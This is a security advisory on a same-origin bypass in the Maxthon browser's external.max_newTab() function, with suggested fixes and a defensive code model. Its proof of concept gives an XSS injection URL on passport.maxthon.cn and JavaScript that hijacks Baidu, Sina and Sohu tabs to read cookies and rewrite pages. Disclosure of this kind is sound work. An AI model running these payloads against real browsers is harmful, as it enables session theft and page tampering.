Maxthon (Aoyou) browser is a multi-tab browser built around Chinese usage habits, with online favorites and advertisement filtering functions that the vendor promotes as the best in the industry. The browser has a security defect in its architectural design; combined with security issues in its own interface functions, it allows the browser's same-origin policy to be bypassed, resulting in a cross-origin scripting vulnerability.
An external interface function in the browser does not follow the same-origin policy, so a cross-origin scripting vulnerability exists.
The vulnerable function, external.max_newTab(), is used to open a new tab. This function has a race condition that allows a caller to bypass the same-origin policy, operate on the window object of a cross-origin page and execute arbitrary script in another domain.
In addition, the browser's custom external interface functions are restricted to a set of trusted domains, which includes *.maxthon.cn among others. Combined with a script injection vulnerability in any web application under *.maxthon.cn, an attacker can call the vulnerable function external.max_newTab() and perform cross-origin operations.
POC:
1. A cross-site scripting vulnerability exists in passport.maxthon.cn. It can be used to call the vulnerable function by embedding a remote script, http://127.0.0.1/vul.js:
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2. JavaScript that calls the vulnerable function:
hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a", "http://www.sina.com/", "activate:yes")
t2 = external.max_newTab("b", "http://www.baidu.com/", "activate:yes")
t3 = external.max_newTab("a", "http://www.sohu.com/", "activate:yes")
setInterval("t1.eval(hijack_code)", 1)
setInterval("t2.eval(hijack_code)", 2)
setInterval("t3.eval(hijack_code)", 3)
Hazard results:
Whichever of the three new tab windows happens to win the race runs the injected cross-domain script: for example, the Baidu page's cookies are read and its content is tampered with.
Solution:
1. Fix the web application vulnerability under the *.maxthon.cn domain.
2. Fix the vulnerability in the interface function external.max_newTab().
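The following is an added illustration, not Maxthon's code: it models the two design choices the advisory describes (a wildcard trust list that gates callers of the privileged API, and a tab handle whose privilege is decided once and then survives whatever the tab later loads) next to a hardened handle that re-checks the tab's current origin on every script execution. The trust-list matcher, the Tab class and the newTab functions are assumptions made for the model, not the browser's real internals.

```javascript
const TRUSTED_CALLERS = ["*.maxthon.cn"]; // trust list as described in the advisory

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`; // scheme + host (+ port): the same-origin tuple
}

// Wildcard match for the trust list; "*.maxthon.cn" must not match "maxthon.cn.evil.example".
function isTrustedCaller(callerUrl) {
  const host = new URL(callerUrl).hostname;
  return TRUSTED_CALLERS.some((pat) =>
    pat.startsWith("*.") ? host === pat.slice(2) || host.endsWith(pat.slice(1)) : host === pat
  );
}

// Minimal model of a tab: it has a current URL and can be navigated later.
class Tab {
  constructor(url) { this.url = url; }
  navigate(url) { this.url = url; }
}

// Vulnerable pattern: privilege is decided once from the caller's identity alone and baked
// into the handle, so the handle keeps working against whatever site the tab shows later.
// eval() returns the origin the script would run in, or null when refused.
function vulnerableNewTab(callerUrl, url) {
  const tab = new Tab(url);
  const privileged = isTrustedCaller(callerUrl);
  return { tab, eval: () => (privileged ? originOf(tab.url) : null) };
}

// Hardened pattern: the trust list still gates the API, but every execution is also checked
// against the tab's *current* origin, so a cross-origin or later-navigated tab is refused.
function hardenedNewTab(callerUrl, url) {
  const tab = new Tab(url);
  const privileged = isTrustedCaller(callerUrl);
  return {
    tab,
    eval: () =>
      privileged && originOf(tab.url) === originOf(callerUrl) ? originOf(tab.url) : null,
  };
}
```

With a trusted caller on passport.maxthon.cn, the vulnerable handle runs script in a baidu.com tab while the hardened one refuses, and refuses again as soon as a same-origin tab navigates elsewhere.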